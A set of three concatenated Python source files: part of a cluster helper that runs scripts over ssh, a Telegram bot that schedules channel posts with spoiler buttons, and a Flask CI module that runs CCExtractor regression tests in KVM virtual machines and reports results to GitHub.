        cluster = self.get_computer_list()
        if info:
            for i in cluster:
                if (cluster[i])["label"] == info or (cluster[i])["name"] == info:
                    # print("computer "+ (cluster[i])["label"]+"/"+ (cluster[i])["name"]+ " is selected")
                    username = ((cluster[i])["credentials"])["username"]
                    publickey = ((cluster[i])["credentials"])["publickey"]
                    item = i
            return item, username, publickey
        else:
            index = random.randint(0, len(cluster) - 1)
            key = list(cluster.keys())[index]
            # print("computer "+ (cluster[key])["label"]+"/"+ (cluster[key])["name"]+ " is selected")
            username = ((cluster[key])["credentials"])["username"]
            publickey = ((cluster[key])["credentials"])["publickey"]
            item = key
            return item, username, publickey

    def run_remote(self, username, publickey, script):
        """Run *script* (a path on the remote machine) via ssh; return output lines."""
        s = subprocess.check_output(["ssh", "-i", publickey, username, "sh", script]).decode("utf-8").split("\n")
        return s

    def scp(self, username, publickey, script):
        """Copy a local script into the remote home directory; return its remote path."""
        subprocess.check_output(["scp", "-i", publickey, script, username + ":~/"])
        return "~/" + script.split("/")[len(script.split("/")) - 1]

    def delete(self, username, publickey, file):
        """Remove *file* on the remote machine."""
        subprocess.check_output(["ssh", "-i", publickey, username, "rm", file])

    def run_local(self, username, publickey, script):
        """Pipe a local script into a remote shell via ssh; return combined output."""
        proc = os.popen("cat " + script + " | " + "ssh" + " -i " + publickey + " " + username + " sh").read()
        return proc

    def parall_list(self, scripts):
        """Assign one computer per script, reusing computers when there are
        more scripts than computers.

        NOTE(review): the random-draw loops only terminate once every
        distinct computer has been drawn — they can spin for a while on
        unlucky draws; also the "repeat" branch appends lists while the
        other branches append tuples, so `cp not in process` comparisons
        mix types. Verify before relying on exact de-duplication.
        """
        count = len(scripts)
        process = []
        c_list = self.get_computer_list()
        max_c = len(c_list)
        if max_c >= count:
            # enough computers: draw distinct ones at random until covered
            while count != 0:
                cp = self.get_computer("")
                if cp not in process:
                    count = count - 1
                    process.append(cp)
        else:
            # more scripts than computers: cover the remainder randomly,
            # then repeat the whole cluster `repeat` times
            rest = count % max_c
            repeat = int(count / max_c)
            while rest != 0:
                cp = self.get_computer("")
                if cp not in process:
                    rest = rest - 1
                    process.append(cp)
            while repeat != 0:
                for i in c_list.keys():
                    process.append(
                        [i, ((c_list[i])["credentials"])["username"], ((c_list[i])["credentials"])["publickey"]])
                repeat = repeat - 1
        return process

    def run_parall(self, scripts):
        """Run each script on its assigned computer in a separate process.

        Returns a list of [computer_id, output] pairs (in queue-drain order,
        not necessarily in script order).
        """
        output = mp.Queue()
        parall_list = self.parall_list(scripts)

        def parall_process(cp, output, script):
            # executed in the child process
            result = self.run_local(cp[1], cp[2], script)
            output.put([cp[0], result])

        process = [mp.Process(target=parall_process, args=(parall_list[x], output, scripts[x])) for x in
                   range(len(scripts))]
        for i in process:
            i.start()
        for i in process:
            i.join()
        result = [output.get() for i in process]
        return result

    def readable(self, result):
        """Pretty-print the result of run_parall."""
        for i in result:
            print(i[0])
            print("Running script and get the result:")
            print(i[1])
|
main.py | # -*- coding: utf-8 -*-
from telebot import *
import datetime
from time import sleep
from dateutil import parser
import json
from threading import Thread
class Hide:
    """A spoiler attached to a post: hidden text revealed via an inline button."""

    def __init__(self, text, title, id, **kwargs):
        self.text, self.title, self.id = text, title, id
        # extra metadata; None when no keyword arguments were supplied
        self.attribute = kwargs or None

    def getText(self):
        """The hidden text."""
        return self.text

    def getTitle(self):
        """Button caption shown in the channel."""
        return self.title

    def getId(self):
        """Identifier used in callback data."""
        return self.id
class Post:
    """A channel post: text, attached spoilers and the scheduled publish time."""

    def __init__(self, text, hides, time, **kwargs):
        self.text, self.hides, self.time = text, hides, time
        # extra metadata; None when no keyword arguments were supplied
        self.attribute = kwargs or None

    def getText(self):
        return self.text

    def getHides(self):
        return self.hides

    def getTime(self):
        return self.time
class PostEncoder(json.JSONEncoder):
    """JSON encoder aware of Post/Hide objects and datetimes."""

    def default(self, obj):
        if isinstance(obj, (Post, Hide)):
            # serialize domain objects via their attribute dict
            return obj.__dict__
        if isinstance(obj, datetime.datetime):
            return obj.strftime("%Y.%m.%d %H:%M")
        return super().default(obj)
bot = telebot.TeleBot('')  # Bot token
chatId = 0  # Id of the channel where posts are published
admin = ""  # Administrator's username

# Module-level state mutated by the handlers below
posts = list()  # all posts ever created
planned = list()  # posts scheduled for future publication
adminStage = 0  # current position in the admin dialog state machine
currentText = ""  # text of the post being composed
currentTime = datetime.datetime.now()
currentHides = list()  # spoilers attached to the post being composed
hidesMessage = 0  # bot message whose inline keyboard lists the spoilers

# Restore previously saved posts from data.json
try:
    f = open('data.json')
    info = json.loads(f.read())
    for post in info:
        hides = list()
        for hide in post["hides"]:
            newHide = Hide(hide["text"], hide["title"], hide["id"])
            hides.append(newHide)
        newPost = Post(post["text"], hides, parser.parse(post["time"]))
        posts.append(newPost)
except:
    # NOTE(review): bare except silently swallows ANY startup error,
    # not only a missing/corrupt data.json
    print("Parsing error")

currentTitle = ""  # title of the spoiler being composed
currentHideText = ""  # body of the spoiler being composed
@bot.message_handler(content_types=['text'])
def get_text_messages(message):
    """Admin dialog state machine: builds and schedules posts with spoilers.

    adminStage values: 0 = main menu, 1 = waiting for post text,
    2 = editing spoilers, 4 = waiting for publish time,
    5 = waiting for spoiler title, 6 = waiting for spoiler text.
    Only the configured admin talking in a private chat is served.
    """
    global adminStage, admin, posts, planned, hidesMessage
    global currentText, currentHides, currentTime
    global chatId
    global currentTitle, currentHideText
    if message.chat.type == "private" and message.from_user.username == admin:
        if message.text == "/start" or message.text == "Отмена":
            # show the main menu keyboard
            mm = types.ReplyKeyboardMarkup(row_width=2)
            button = types.KeyboardButton("Создать новую запись")
            mm.add(button)
            button1 = types.KeyboardButton("История публикаций")
            button2 = types.KeyboardButton("Отложенные посты")
            mm.add(button1, button2)
            bot.send_message(message.from_user.id, "Вас приветствует бот для публикации защищенных от парсинга сообщений.", reply_markup=mm)
            adminStage = 0
        elif message.text == "Создать новую запись":
            # start composing a new post
            mm = types.ReplyKeyboardMarkup(row_width=1)
            button = types.KeyboardButton("Отмена")
            mm.add(button)
            bot.send_message(message.from_user.id, "Укажите текст публикуемой записи:", reply_markup=mm)
            adminStage = 1
        elif message.text == "История публикаций":
            # send the publication log as a document
            doc = open('log.txt', 'rb')
            bot.send_document(message.chat.id, doc)
        elif message.text == "Отложенные посты":
            # list planned posts as inline buttons for deletion
            key = types.InlineKeyboardMarkup()
            i = 0
            for post in planned:
                but = types.InlineKeyboardButton(text=post.getText(), callback_data="DeletePost_" + str(i))
                key.add(but)
                i += 1
            bot.send_message(message.from_user.id, "Выберите пост для удаления:", reply_markup=key)
        else:
            if adminStage == 0:
                bot.send_message(message.from_user.id, "Неизвестная команда")
            elif adminStage == 1:
                # got the post text; show the spoiler editing keyboard
                currentText = message.text
                key = types.InlineKeyboardMarkup()
                but = types.InlineKeyboardButton(text="Далее", callback_data="NextHide")
                key.add(but)
                but = types.InlineKeyboardButton(text="Добавить", callback_data="AddHide")
                key.add(but)
                hidesMessage = bot.send_message(message.from_user.id, "Измените прикрепленные к записи спойлеры:", reply_markup=key)
                adminStage = 2
            elif adminStage == 4:
                # got the publication time; schedule the post
                datetime_object = parser.parse(message.text)
                posts.append(Post(currentText, currentHides, datetime_object))
                planned.append(posts[len(posts) - 1])
                mm = types.ReplyKeyboardMarkup(row_width=2)
                button = types.KeyboardButton("Создать новую запись")
                mm.add(button)
                button1 = types.KeyboardButton("История публикаций")
                button2 = types.KeyboardButton("Отложенные посты")
                mm.add(button1, button2)
                saveData()
                bot.send_message(message.chat.id, "Запись успешно запланирована", reply_markup=mm)
                printer("Запланирована новая запись")
                adminStage = 0
                currentHides = list()
            elif adminStage == 5:
                # got the spoiler title; ask for its visible text
                currentTitle = message.text
                bot.send_message(message.from_user.id, "Укажите отображаемый текст:")
                adminStage = 6
            elif adminStage == 6:
                # got the spoiler text; attach it and refresh the inline keyboard
                currentHideText = message.text
                hide = Hide(currentHideText, currentTitle, str(len(posts)) + "_" + str(len(currentHides)))
                currentHides.append(hide)
                key = hidesMessage.reply_markup
                but = types.InlineKeyboardButton(text=currentTitle, callback_data="editHide_" + hide.getId())
                key.add(but)
                hidesMessage = bot.edit_message_reply_markup(hidesMessage.chat.id, hidesMessage.message_id, reply_markup=key)
                adminStage = 2
                bot.send_message(message.from_user.id, "Спойлер успешно добавлен")
@bot.callback_query_handler(func=lambda c:True)
def inline(c):
    # Inline-keyboard callback dispatcher.
    # ``c.data`` encodes the action; the global ``adminStage`` state machine
    # gates which admin actions are currently valid.
    global adminStage, admin, posts, hidesMessage
    global currentText, currentHides, currentTime
    global chatId
    global planned
    if c.data == "NextHide" and adminStage == 2:
        # Spoiler editing finished -> ask whether to schedule or publish now.
        key = types.InlineKeyboardMarkup()
        but1 = types.InlineKeyboardButton(text="Да", callback_data="YesTime")
        but2 = types.InlineKeyboardButton(text="Опубликовать сейчас", callback_data="NoTime")
        key.add(but1, but2)
        bot.send_message(c.message.chat.id, "Опубликовать запись в определенное время?", reply_markup=key)
        adminStage = 3
    if c.data == "AddHide" and adminStage == 2:
        # Start adding a new spoiler: ask for its title (handled at stage 5).
        bot.send_message(c.message.chat.id, "Укажите заголовок спойлера:")
        adminStage = 5
    elif c.data == "YesTime" and adminStage == 3:
        # Scheduled publication: ask for the date/time (handled at stage 4).
        bot.send_message(c.message.chat.id, "Укажите время публикации в формате dd.mm.yyyy hh:mm:")
        adminStage = 4
    elif c.data == "NoTime" and adminStage == 3:
        # Immediate publication: attach one button per spoiler and post to the
        # channel ``chatId``, then restore the admin main menu.
        posts.append(Post(currentText, currentHides, datetime.datetime.now()))
        key = types.InlineKeyboardMarkup()
        for hide in currentHides:
            but = types.InlineKeyboardButton(text=hide.getTitle(), callback_data="showHide_" + hide.getId())
            key.add(but)
        bot.send_message(chatId, currentText, reply_markup=key)
        mm = types.ReplyKeyboardMarkup(row_width=2)
        button = types.KeyboardButton("Создать новую запись")
        mm.add(button)
        button1 = types.KeyboardButton("История публикаций")
        button2 = types.KeyboardButton("Отложенные посты")
        mm.add(button1, button2)
        saveData()
        currentHides = list()
        bot.send_message(c.message.chat.id, "Запись успешно опубликована", reply_markup=mm)
        printer("Опубликована новая запись")
        adminStage = 0
    elif str(c.data).startswith("editHide_"):
        # Tapping a spoiler in the edit keyboard removes it: rebuild the
        # keyboard (and ``currentHides``) without the tapped entry.
        newHides = list()
        key = types.InlineKeyboardMarkup()
        but = types.InlineKeyboardButton(text="Далее", callback_data="NextHide")
        key.add(but)
        but = types.InlineKeyboardButton(text="Добавить", callback_data="AddHide")
        key.add(but)
        for hide in currentHides:
            if "editHide_" + hide.getId() != str(c.data):
                newHides.append(hide)
                but = types.InlineKeyboardButton(text=hide.getTitle(), callback_data="editHide_" + hide.getId())
                key.add(but)
        currentHides = newHides
        hidesMessage = bot.edit_message_reply_markup(hidesMessage.chat.id, hidesMessage.message_id, reply_markup=key)
        bot.send_message(c.message.chat.id, "Спойлер успешно удален")
    elif str(c.data).startswith("showHide_"):
        # Reader tapped a spoiler; data is "showHide_<postIdx>_<hideIdx>"
        # (indexes assigned when the hide was created).
        data = str(c.data).split("_")
        first = int(data[1])
        second = int(data[2])
        bot.answer_callback_query(callback_query_id=c.id, text=posts[first].getHides()[second].getText(), show_alert=True)
    elif str(c.data).startswith("DeletePost_"):
        # Admin deletes a planned post; the index refers to ``planned``.
        data = str(c.data).split("_")
        index = int(data[1])
        posts.remove(planned[index])
        planned.remove(planned[index])
        bot.send_message(c.message.chat.id, "Запись успешно удалена")
        printer("Удалена запланированная запись")
def saveData():
    """Serialize all posts to ``data.json`` and log the write.

    Uses the module-level ``posts`` list and the ``PostEncoder`` JSON encoder.
    """
    # Context manager guarantees the handle is flushed and closed even if
    # serialization raises (the original leaked the file handle).
    with open('data.json', 'w') as f:
        f.write(json.dumps(posts, indent=4, cls=PostEncoder))
    printer("Данные о постах записаны в файл")
def checkPlanned(*args, **kwargs):
    """Background worker: once a second, publish every planned post whose
    scheduled time has passed, then remove it from ``planned``.

    Runs forever; intended to be started in a daemon-style thread.
    """
    while True:
        global planned
        # Iterate over a snapshot: removing from ``planned`` while iterating
        # the live list skips the element after each removal (bug in the
        # original).
        for post in list(planned):
            if datetime.datetime.now() >= post.getTime():
                key = types.InlineKeyboardMarkup()
                for hide in post.getHides():
                    but = types.InlineKeyboardButton(text=hide.getTitle(), callback_data="showHide_" + hide.getId())
                    key.add(but)
                # Publish the post's own text. The original sent the global
                # ``currentText`` (the admin's current draft), which is wrong
                # for any post scheduled earlier.
                bot.send_message(chatId, post.getText(), reply_markup=key)
                printer("Опубликована новая запись")
                planned.remove(post)
        sleep(1)
def printer(printing):
    """Append a timestamped line with ``printing`` to ``log.txt``.

    :param printing: any value; converted with ``str`` before writing.
    :return: the ``printer`` function itself (preserved from the original,
        which returned itself; callers may rely on the truthy return).
    """
    # ``with`` closes the handle even if the write fails (the original
    # closed it manually, leaking on exceptions).
    with open("log.txt", "a") as log_file:
        log_file.write("[" + str(datetime.datetime.now()) + "] " + str(printing) + '\n')
    return printer
# Start the background publisher thread, then block in the bot's long-poll
# loop (interval=0 -> poll continuously; none_stop=True -> survive errors).
th = Thread(target=checkPlanned, args=())
th.start()
bot.polling(none_stop=True, interval=0)
|
controllers.py | """maintains all functionality related running virtual machines, starting and tracking tests."""
import datetime
import hashlib
import json
import os
import shutil
import sys
from multiprocessing import Process
from typing import Any
import requests
from flask import (Blueprint, abort, flash, g, jsonify, redirect, request,
url_for)
from git import GitCommandError, InvalidGitRepositoryError, Repo
from github import ApiError, GitHub
from lxml import etree
from lxml.etree import Element
from markdown2 import markdown
from pymysql.err import IntegrityError
from sqlalchemy import and_, func, or_
from sqlalchemy.sql import label
from sqlalchemy.sql.functions import count
from werkzeug.utils import secure_filename
from decorators import get_menu_entries, template_renderer
from mailer import Mailer
from mod_auth.controllers import check_access_rights, login_required
from mod_auth.models import Role
from mod_ci.forms import AddUsersToBlacklist, RemoveUsersFromBlacklist
from mod_ci.models import BlockedUsers, Kvm, MaintenanceMode
from mod_customized.models import CustomizedTest
from mod_deploy.controllers import is_valid_signature, request_from_github
from mod_home.models import CCExtractorVersion, GeneralData
from mod_regression.models import (Category, RegressionTest,
RegressionTestOutput,
regressionTestLinkTable)
from mod_sample.models import Issue
from mod_test.models import (Fork, Test, TestPlatform, TestProgress,
TestResult, TestResultFile, TestStatus, TestType)
# libvirt bindings are only available/usable on Linux; guard the import so
# the module still loads elsewhere (VM control is then unavailable).
if sys.platform.startswith("linux"):
    import libvirt

# Blueprint under which all CI routes in this module are registered.
mod_ci = Blueprint('ci', __name__)
class Status:
    """Define different states for the tests.

    The string values are posted as the ``state`` field of GitHub commit
    statuses (see the ``repository.statuses(...).post`` calls in this module).
    """

    PENDING = "pending"
    SUCCESS = "success"
    ERROR = "error"
    FAILURE = "failure"
@mod_ci.before_app_request
def before_app_request() -> None:
    """Organize menu content such as Platform management before request."""
    platform_entries = get_menu_entries(
        g.user, 'Platform mgmt', 'cog', [], '', [
            {'title': 'Maintenance', 'icon': 'wrench',
             'route': 'ci.show_maintenance', 'access': [Role.admin]},  # type: ignore
            {'title': 'Blocked Users', 'icon': 'ban',
             'route': 'ci.blocked_users', 'access': [Role.admin]}  # type: ignore
        ]
    )
    # Prepend our entries to an existing 'config' menu when possible;
    # otherwise install the freshly built menu wholesale.
    if 'config' in g.menu_entries and 'entries' in platform_entries:
        combined = platform_entries['entries'] + g.menu_entries['config']['entries']
        g.menu_entries['config']['entries'] = combined
    else:
        g.menu_entries['config'] = platform_entries
def start_platforms(db, repository, delay=None, platform=None) -> None:
    """
    Start new test on both platforms in parallel.

    We use multiprocessing module which bypasses Python GIL to make use of multiple cores of the processor.

    :param db: database connection
    :param repository: repository to run tests on
    :param delay: optional delay (seconds) forwarded to each kvm_processor
    :param platform: restrict launch to a single TestPlatform, or None for both
    """
    from run import config, log, app
    with app.app_context():
        from flask import current_app

        def launch(test_platform, config_key, label) -> None:
            # One worker process per platform; kvm_processor does the work.
            # (Deduplicates the formerly copy-pasted linux/windows branches.)
            kvm_name = config.get(config_key, '')
            log.info(f'Define process to run {label} VM')
            process = Process(target=kvm_processor, args=(current_app._get_current_object(), db, kvm_name,
                                                          test_platform, repository, delay,))
            process.start()
            log.info(f'{label} VM process kicked off')

        if platform is None or platform == TestPlatform.linux:
            launch(TestPlatform.linux, 'KVM_LINUX_NAME', 'Linux')
        if platform is None or platform == TestPlatform.windows:
            launch(TestPlatform.windows, 'KVM_WINDOWS_NAME', 'Windows')
def kvm_processor(app, db, kvm_name, platform, repository, delay) -> None:
    """
    Check whether there is no already running same kvm.

    Checks whether machine is in maintenance mode or not
    Launch kvm if not used by any other test
    Creates testing xml files to test the change in main repo.
    Creates clone with separate branch and merge pr into it.

    :param app: The Flask app
    :type app: Flask
    :param db: database connection
    :type db: sqlalchemy.orm.scoped_session
    :param kvm_name: name for the kvm
    :type kvm_name: str
    :param platform: operating system
    :type platform: TestPlatform
    :param repository: GitHub API wrapper for the repository to run tests on
    :type repository: Any
    :param delay: time delay after which to start kvm processor
    :type delay: int
    """
    from run import config, log, get_github_config
    github_config = get_github_config(config)
    log.info(f"[{platform}] Running kvm_processor")
    if kvm_name == "":
        log.critical(f'[{platform}] KVM name is empty!')
        return
    if delay is not None:
        import time
        log.debug(f'[{platform}] Sleeping for {delay} seconds')
        time.sleep(delay)
    # Bail out early when this platform is flagged for maintenance.
    maintenance_mode = MaintenanceMode.query.filter(MaintenanceMode.platform == platform).first()
    if maintenance_mode is not None and maintenance_mode.disabled:
        log.debug(f'[{platform}] In maintenance mode! Waiting...')
        return
    conn = libvirt.open("qemu:///system")
    if conn is None:
        log.critical(f"[{platform}] Connection to libvirt failed!")
        return
    try:
        vm = conn.lookupByName(kvm_name)
    except libvirt.libvirtError:
        log.critical(f"[{platform}] No VM named {kvm_name} found!")
        return
    vm_info = vm.info()
    if vm_info[0] != libvirt.VIR_DOMAIN_SHUTOFF:
        # Running, check expiry and compare to runtime
        status = Kvm.query.filter(Kvm.name == kvm_name).first()
        max_runtime = config.get("KVM_MAX_RUNTIME", 120)
        if status is not None:
            if datetime.datetime.now() - status.timestamp >= datetime.timedelta(minutes=max_runtime):
                # Run exceeded its time budget: cancel the test, drop the Kvm
                # row and kill the VM, then fall through to pick the next test.
                test_progress = TestProgress(status.test.id, TestStatus.canceled, 'Runtime exceeded')
                db.add(test_progress)
                db.delete(status)
                db.commit()
                if vm.destroy() == -1:
                    log.critical(f"[{platform}] Failed to shut down {kvm_name}")
                    return
            else:
                log.info(f"[{platform}] Current job not expired yet.")
                return
        else:
            log.warn(f"[{platform}] No task, but VM is running! Hard reset necessary")
            if vm.destroy() == -1:
                log.critical(f"[{platform}] Failed to shut down {kvm_name}")
                return
    # Check if there's no KVM status left
    status = Kvm.query.filter(Kvm.name == kvm_name).first()
    if status is not None:
        log.warn(f"[{platform}] KVM is powered off, but test {status.test.id} still present, deleting entry")
        db.delete(status)
        db.commit()
    # Get oldest test for this platform
    finished_tests = db.query(TestProgress.test_id).filter(
        TestProgress.status.in_([TestStatus.canceled, TestStatus.completed])
    ).subquery()
    # Prefer tests on the main repository's fork entry; fall back to any fork.
    fork_location = f"%/{github_config['repository_owner']}/{github_config['repository']}.git"
    fork = Fork.query.filter(Fork.github.like(fork_location)).first()
    test = Test.query.filter(
        Test.id.notin_(finished_tests), Test.platform == platform, Test.fork_id == fork.id
    ).order_by(Test.id.asc()).first()
    if test is None:
        test = Test.query.filter(Test.id.notin_(finished_tests), Test.platform == platform).order_by(
            Test.id.asc()).first()
    if test is None:
        log.info(f'[{platform}] No more tests to run, returning')
        return
    if test.test_type == TestType.pull_request and test.pr_nr == 0:
        # PR tests must carry a PR number; drop malformed rows.
        log.warn(f'[{platform}] Test {test.id} is invalid, deleting')
        db.delete(test)
        db.commit()
        return
    # Reset to snapshot
    if vm.hasCurrentSnapshot() != 1:
        log.critical(f"[{platform}] VM {kvm_name} has no current snapshot set!")
        return
    snapshot = vm.snapshotCurrent()
    if vm.revertToSnapshot(snapshot) == -1:
        log.critical(f"[{platform}] Failed to revert to {snapshot.getName()} for {kvm_name}")
        return
    log.info(f"[{platform}] Reverted to {snapshot.getName()} for {kvm_name}")
    log.debug(f'[{platform}] Starting test {test.id}')
    # Kvm row is only committed after the VM successfully powers on (below).
    status = Kvm(kvm_name, test.id)
    # Prepare data
    # 0) Write url to file
    with app.app_context():
        # url_for needs an app context; the VM reads this URL to report back.
        full_url = url_for('ci.progress_reporter', test_id=test.id, token=test.token, _external=True, _scheme="https")
        file_path = os.path.join(config.get('SAMPLE_REPOSITORY', ''), 'vm_data', kvm_name, 'reportURL')
        with open(file_path, 'w') as f:
            f.write(full_url)
    # 1) Generate test files
    base_folder = os.path.join(config.get('SAMPLE_REPOSITORY', ''), 'vm_data', kvm_name, 'ci-tests')
    categories = Category.query.order_by(Category.id.desc()).all()
    # Baseline commit for this platform; results are compared against it.
    commit_name = 'fetch_commit_' + platform.value
    commit_hash = GeneralData.query.filter(GeneralData.key == commit_name).first().value
    last_commit = Test.query.filter(and_(Test.commit == commit_hash, Test.platform == platform)).first()
    log.debug(f"[{platform}] We will compare against the results of test {last_commit.id}")
    regression_ids = test.get_customized_regressiontests()
    # Init collection file
    multi_test = etree.Element('multitest')
    for category in categories:
        # Skip categories without tests
        if len(category.regression_tests) == 0:
            continue
        # Create XML file for test
        file_name = '{name}.xml'.format(name=category.name)
        single_test = etree.Element('tests')
        should_write_xml = False
        for regression_test in category.regression_tests:
            if regression_test.id not in regression_ids:
                log.debug(f'Skipping RT #{regression_test.id} ({category.name}) as not in scope')
                continue
            should_write_xml = True
            entry = etree.SubElement(single_test, 'entry', id=str(regression_test.id))
            command = etree.SubElement(entry, 'command')
            command.text = regression_test.command
            input_node = etree.SubElement(entry, 'input', type=regression_test.input_type.value)
            # Need a path that is relative to the folder we provide inside the CI environment.
            input_node.text = regression_test.sample.filename
            output_node = etree.SubElement(entry, 'output')
            output_node.text = regression_test.output_type.value
            compare = etree.SubElement(entry, 'compare')
            # Result files of the baseline run; used to choose "correct" files.
            last_files = TestResultFile.query.filter(and_(
                TestResultFile.test_id == last_commit.id,
                TestResultFile.regression_test_id == regression_test.id
            )).subquery()
            for output_file in regression_test.output_files:
                ignore_file = str(output_file.ignore).lower()
                file_node = etree.SubElement(compare, 'file', ignore=ignore_file, id=str(output_file.id))
                last_commit_files = db.query(last_files.c.got).filter(and_(
                    last_files.c.regression_test_output_id == output_file.id,
                    last_files.c.got.isnot(None)
                )).first()
                correct = etree.SubElement(file_node, 'correct')
                # Need a path that is relative to the folder we provide inside the CI environment.
                if last_commit_files is None:
                    log.debug(f"Selecting original file for RT #{regression_test.id} ({category.name})")
                    correct.text = output_file.filename_correct
                else:
                    correct.text = output_file.create_correct_filename(last_commit_files[0])
                expected = etree.SubElement(file_node, 'expected')
                expected.text = output_file.filename_expected(regression_test.sample.sha)
        if not should_write_xml:
            # Nothing in scope for this category: don't emit an empty file.
            continue
        save_xml_to_file(single_test, base_folder, file_name)
        # Append to collection file
        test_file = etree.SubElement(multi_test, 'testfile')
        location = etree.SubElement(test_file, 'location')
        location.text = file_name
    save_xml_to_file(multi_test, base_folder, 'TestAll.xml')
    # 2) Create git repo clone and merge PR into it (if necessary)
    try:
        repo = Repo(os.path.join(config.get('SAMPLE_REPOSITORY', ''), 'vm_data', kvm_name, 'unsafe-ccextractor'))
    except InvalidGitRepositoryError:
        log.critical(f"[{platform}] Could not open CCExtractor's repository copy!")
        return
    # Return to master
    repo.heads.master.checkout(True)
    # Update repository from upstream
    try:
        github_url = test.fork.github
        if is_main_repo(github_url):
            origin = repo.remote('origin')
        else:
            # Forks get a dedicated remote, created on first use.
            fork_id = test.fork.id
            remote = f'fork_{fork_id}'
            if remote in [remote.name for remote in repo.remotes]:
                origin = repo.remote(remote)
            else:
                origin = repo.create_remote(remote, url=github_url)
    except ValueError:
        log.critical(f"[{platform}] Origin remote doesn't exist!")
        return
    fetch_info = origin.fetch()
    if len(fetch_info) == 0:
        log.info(f'[{platform}] Fetch from remote returned no new data...')
    # Checkout to Remote Master
    repo.git.checkout(origin.refs.master)
    # Pull code (finally)
    pull_info = origin.pull('master')
    if len(pull_info) == 0:
        log.info(f"[{platform}] Pull from remote returned no new data...")
    elif pull_info[0].flags > 128:
        # NOTE(review): flags above 128 are treated as a fetch/pull error
        # (GitPython FetchInfo flag bits) — confirm against GitPython docs.
        log.critical(f"[{platform}] Did not pull any information from remote: {pull_info[0].flags}!")
        return
    ci_branch = 'CI_Branch'
    # Delete the test branch if it exists, and recreate
    try:
        repo.delete_head(ci_branch, force=True)
    except GitCommandError:
        log.info(f"[{platform}] Could not delete CI_Branch head")
    # Remove possible left rebase-apply directory
    try:
        shutil.rmtree(os.path.join(config.get('SAMPLE_REPOSITORY', ''), 'unsafe-ccextractor', '.git', 'rebase-apply'))
    except OSError:
        log.info(f"[{platform}] Could not delete rebase-apply")
    # If PR, merge, otherwise reset to commit
    if test.test_type == TestType.pull_request:
        # Fetch PR (stored under origin/pull/<id>/head)
        pull_info = origin.fetch(f'pull/{test.pr_nr}/head:{ci_branch}')
        if len(pull_info) == 0:
            log.warn(f"[{platform}] Did not pull any information from remote PR!")
        elif pull_info[0].flags > 128:
            log.critical(f"[{platform}] Did not pull any information from remote PR: {pull_info[0].flags}!")
            return
        try:
            test_branch = repo.heads[ci_branch]
        except IndexError:
            log.critical(f'{ci_branch} does not exist')
            return
        test_branch.checkout(True)
        try:
            pull = repository.pulls(f'{test.pr_nr}').get()
        except ApiError as a:
            log.error(f'Got an exception while fetching the PR payload! Message: {a.message}')
            return
        if pull['mergeable'] is False:
            # PR cannot be merged cleanly: cancel the test and report the
            # failure as a commit status on GitHub, then stop.
            progress = TestProgress(test.id, TestStatus.canceled, "Commit could not be merged", datetime.datetime.now())
            db.add(progress)
            db.commit()
            try:
                with app.app_context():
                    repository.statuses(test.commit).post(
                        state=Status.FAILURE,
                        description="Tests canceled due to merge conflict",
                        context=f"CI - {test.platform.value}",
                        target_url=url_for('test.by_id', test_id=test.id, _external=True)
                    )
            except ApiError as a:
                log.error(f'Got an exception while posting to GitHub! Message: {a.message}')
            return
        # Merge on master if no conflict
        repo.git.merge('master')
    else:
        test_branch = repo.create_head(ci_branch, origin.refs.master)
        test_branch.checkout(True)
        try:
            repo.head.reset(test.commit, working_tree=True)
        except GitCommandError:
            log.warn(f"[{platform}] Commit {test.commit} for test {test.id} does not exist!")
            return
    # Power on machine
    try:
        vm.create()
        db.add(status)
        db.commit()
    except libvirt.libvirtError as e:
        log.critical(f"[{platform}] Failed to launch VM {kvm_name}")
        log.critical(f"Information about failure: code: {e.get_error_code()}, domain: {e.get_error_domain()}, "
                     f"level: {e.get_error_level()}, message: {e.get_error_message()}")
    except IntegrityError:
        log.warn(f"[{platform}] Duplicate entry for {test.id}")
    # Close connection to libvirt
    conn.close()
def save_xml_to_file(xml_node, folder_name, file_name) -> None:
    """
    Save the given XML node to a file in a certain folder.

    :param xml_node: The XML content element to write to the file.
    :type xml_node: Element
    :param folder_name: The folder name.
    :type folder_name: str
    :param file_name: The name of the file
    :type file_name: str
    :return: Nothing
    :rtype: None
    """
    destination = os.path.join(folder_name, file_name)
    document = xml_node.getroottree()
    # Pretty-printed, declared UTF-8 output so the VM-side runner can parse it.
    document.write(destination, encoding='utf-8', xml_declaration=True, pretty_print=True)
def queue_test(db, gh_commit, commit, test_type, branch="master", pr_nr=0) -> None:
    """
    Store test details into Test model for each platform, and post the status to GitHub.

    :param db: Database connection.
    :type db: sqlalchemy.orm.scoped_session
    :param gh_commit: The GitHub API call for the commit. Can be None
    :type gh_commit: Any
    :param commit: The commit hash.
    :type commit: str
    :param test_type: The type of test
    :type test_type: TestType
    :param branch: Branch name
    :type branch: str
    :param pr_nr: Pull Request number, if applicable.
    :type pr_nr: int
    :return: Nothing
    :rtype: None
    """
    from run import log
    # Resolve our own Fork row by matching the tail of its GitHub URL.
    fork_url = f"%/{g.github['repository_owner']}/{g.github['repository']}.git"
    fork = Fork.query.filter(Fork.github.like(fork_url)).first()
    if test_type == TestType.pull_request:
        log.debug('pull request test type detected')
        branch = "pull_request"
    # One Test row per platform. Commit happens before the ids are read below.
    linux_test = Test(TestPlatform.linux, test_type, fork.id, branch, commit, pr_nr)
    db.add(linux_test)
    windows_test = Test(TestPlatform.windows, test_type, fork.id, branch, commit, pr_nr)
    db.add(windows_test)
    db.commit()
    add_customized_regression_tests(linux_test.id)
    add_customized_regression_tests(windows_test.id)
    if gh_commit is not None:
        # Post a "queued" pending status per platform on the commit.
        status_entries = {
            linux_test.platform.value: linux_test.id,
            windows_test.platform.value: windows_test.id
        }
        for platform_name, test_id in status_entries.items():
            try:
                gh_commit.post(
                    state=Status.PENDING,
                    description="Tests queued",
                    context=f"CI - {platform_name}",
                    target_url=url_for('test.by_id', test_id=test_id, _external=True)
                )
            except ApiError as a:
                log.critical(f'Could not post to GitHub! Response: {a.response}')
    log.debug("Created tests, waiting for cron...")
def inform_mailing_list(mailer, id, title, author, body) -> None:
    """
    Send mail to subscribed users when a issue is opened via the Webhook.

    :param mailer: The mailer instance
    :type mailer: Mailer
    :param id: ID of the Issue Opened
    :type id: int
    :param title: Title of the Created Issue
    :type title: str
    :param author: The Authors Username of the Issue
    :type author: str
    :param body: The Content of the Issue
    :type body: str
    """
    from run import get_github_issue_link
    issue_url = get_github_issue_link(id)
    message = {
        "to": "ccextractor-dev@googlegroups.com",
        "subject": f"GitHub Issue #{id}",
        "html": get_html_issue_body(title=title, author=author, body=body, issue_number=id, url=issue_url)
    }
    delivered = mailer.send_simple_message(message)
    if not delivered:
        g.log.error('failed to send issue to mailing list')
